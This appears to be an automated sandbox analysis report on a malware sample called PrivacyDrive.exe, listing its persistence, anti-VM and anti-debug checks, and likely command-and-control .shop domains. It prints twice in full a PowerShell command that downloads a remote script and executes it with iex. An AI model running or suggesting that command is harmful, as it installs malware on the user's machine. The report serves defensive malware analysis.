Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Section loaded: version.dll
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdb source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr
Source: Binary string: F:\PD3\bin\Release\PrivacyDrive.pdbN source: PrivacyDrive.exe, 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000000.1815371616.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000004.00000003.1912706269.00000000052C4000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2149603912.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000000.1925315316.0000000000552000.00000002.00000001.01000000.00000006.sdmp, PrivacyDrive.exe, 00000008.00000003.2019923963.0000000005386000.00000004.00000800.00020000.00000000.sdmp, PrivacyDrive.exe.2.dr

Data Obfuscation

Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0050E640 LoadLibraryW,GetProcAddress,VirtualAlloc, 4_2_0050E640
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0041E2B0 push ecx; mov dword ptr [esp], 42C00000h 4_2_0041E4B6
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0041E2B0 push ecx; mov dword ptr [esp], 42C00000h 4_2_0041E4F0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_004CB540 push ecx; mov dword ptr [esp], 3F800000h 4_2_004CB572
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0041E570 push ecx; mov dword ptr [esp], 3F800000h 4_2_0041E6F3
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00448697 pushfd ; iretd 4_2_004486A2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0041E7B0 push ecx; mov dword ptr [esp], 3F800000h 4_2_0041E99C
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00426880 push ecx; mov dword ptr [esp], 3F800000h 4_2_004268B2
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_004CB9E0 push ecx; mov dword ptr [esp], 3F800000h 4_2_004CBA12
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0041EA60 push ecx; mov dword ptr [esp], 3F800000h 4_2_0041EC2B
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00419A00 push ecx; mov dword ptr [esp], 3F800000h 4_2_00419A34
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_004ECB30 push ecx; mov dword ptr [esp], 00000000h 4_2_004ECB42
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00486BD0 push ecx; mov dword ptr [esp], 3F800000h 4_2_00486C06
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00486BD0 push ecx; mov dword ptr [esp], 3F800000h 4_2_00486C2D
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00502C4E push ecx; ret 4_2_00502C61
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00506C25 push ecx; ret 4_2_00506C38
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0041BFA0 push ecx; mov dword ptr [esp], 3F800000h 4_2_0041BFEB
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00FC2307 push ecx; retf 4_2_00FC2308
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_051E0905 push ecx; retf 4_2_051E0906
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00FB2307 push ecx; retf 8_2_00FB2308
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_01210905 push ecx; retf 8_2_01210906

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 4_2_0045D070
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: RegCloseKey,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 4_2_0045CD20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: \KnownDlls32\BitsProxy.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe

Boot Survival

Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: RegCloseKey,DeviceIoControl,swprintf,CreateFileW,DeviceIoControl,_memset,DeviceIoControl,DeviceIoControl,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 4_2_0045D070
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: RegCloseKey,CreateFileW,_memset,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 4_2_0045CD20
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0041CDA0 QueryServiceStatus,CloseServiceHandle,Sleep,QueryServiceStatus,StartServiceW,GetLastError,Sleep, 4_2_0041CDA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RATU0Beb

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_004CDA40 SendMessageW,GetWindowRect,IsIconic,GetWindowRect,PostMessageW,IsZoomed, 4_2_004CDA40
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00489C60 IsWindowVisible,IsIconic,PostMessageW,IsIconic, 4_2_00489C60
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00489D10 IsWindowVisible,IsIconic,SendMessageW,IsIconic,SendMessageW,ShowWindow,IsWindow,IsWindow,IsWindow,IsWindow,PostMessageW, 4_2_00489D10
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00417E90 IsWindow,GetWindowRect,IsWindow,IsWindowVisible,IsIconic,GetWindowRect,SetWindowPos, 4_2_00417E90
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6753 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2978 Jump to behavior
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe API coverage: 1.4 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7136 Thread sleep count: 6753 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7156 Thread sleep count: 2978 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4320 Thread sleep time: -11990383647911201s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2836 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 7132 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 7000 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe TID: 2588 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00477BE0 FindFirstFileW, 4_2_00477BE0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00495D80 FindFirstFileW,FindClose, 4_2_00495D80
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: Amcache.hve.12.dr Binary or memory string: VMware
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr Binary or memory string: VMware, Inc.
Source: PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW<
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: svchost.exe, 00000003.00000002.2895794367.0000024B03A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2896731206.0000024B09052000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2895818846.0000024B03A2B000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.000000000119D000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1923349621.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000002.2151995341.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.000000000119D000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000004.00000003.1921722991.00000000011DF000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2028857496.0000000001610000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.0000000001610000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Amcache.hve.12.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: PrivacyDrive.exe, 00000008.00000003.2028656440.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000003.2040432796.00000000015B9000.00000004.00000020.00020000.00000000.sdmp, PrivacyDrive.exe, 00000008.00000002.2150460238.00000000015B9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW`.a
Source: Amcache.hve.12.dr Binary or memory string: vmci.sys
Source: Amcache.hve.12.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.12.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_051E6730 LdrInitializeThunk, 4_2_051E6730
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0050E173 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 4_2_0050E173
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0050E173 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 4_2_0050E173
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0050E640 LoadLibraryW,GetProcAddress,VirtualAlloc, 4_2_0050E640
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00F8055F mov edx, dword ptr fs:[00000030h] 4_2_00F8055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00F80B1F mov eax, dword ptr fs:[00000030h] 4_2_00F80B1F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00F8116E mov eax, dword ptr fs:[00000030h] 4_2_00F8116E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00F8116F mov eax, dword ptr fs:[00000030h] 4_2_00F8116F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00F80ECF mov eax, dword ptr fs:[00000030h] 4_2_00F80ECF
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F7055F mov edx, dword ptr fs:[00000030h] 8_2_00F7055F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F70B1F mov eax, dword ptr fs:[00000030h] 8_2_00F70B1F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F7116F mov eax, dword ptr fs:[00000030h] 8_2_00F7116F
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F7116E mov eax, dword ptr fs:[00000030h] 8_2_00F7116E
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 8_2_00F70ECF mov eax, dword ptr fs:[00000030h] 8_2_00F70ECF
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_005068B4 GetModuleFileNameW,___crtMessageBoxW,GetStdHandle,_strlen,WriteFile,__invoke_watson,GetProcessHeap, 4_2_005068B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_0050709C SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_0050709C

HIPS / PFW / Operating System Protection Evasion

Source: PrivacyDrive.exe String found in binary or memory: surroundeocw.shop
Source: PrivacyDrive.exe String found in binary or memory: covvercilverow.shop
Source: PrivacyDrive.exe String found in binary or memory: pumpkinkwquo.shop
Source: PrivacyDrive.exe String found in binary or memory: abortinoiwiam.shop
Source: PrivacyDrive.exe String found in binary or memory: deallyharvenw.shop
Source: PrivacyDrive.exe String found in binary or memory: priooozekw.shop
Source: PrivacyDrive.exe String found in binary or memory: racedsuitreow.shop
Source: PrivacyDrive.exe String found in binary or memory: defenddsouneuw.shop
Source: PrivacyDrive.exe String found in binary or memory: candleduseiwo.shop
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: 4_2_00477990 SetWindowPos,GetWindowRect,GetCursorPos,ShowCursor,ShowCursor,SetCursorPos,mouse_event,mouse_event,mouse_event,SetCursorPos,ShowCursor,SetWindowPos,SetForegroundWindow,SetFocus, 4_2_00477990
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -command $url = 'https://finalstepgo.com/uploads/il2.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe "C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe"
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,FileTimeToSystemTime,GetDateFormatW,GetTimeFormatW, 4_2_00485BE0
Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetDateFormatW,GetTimeFormatW, 4_2_00485D60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
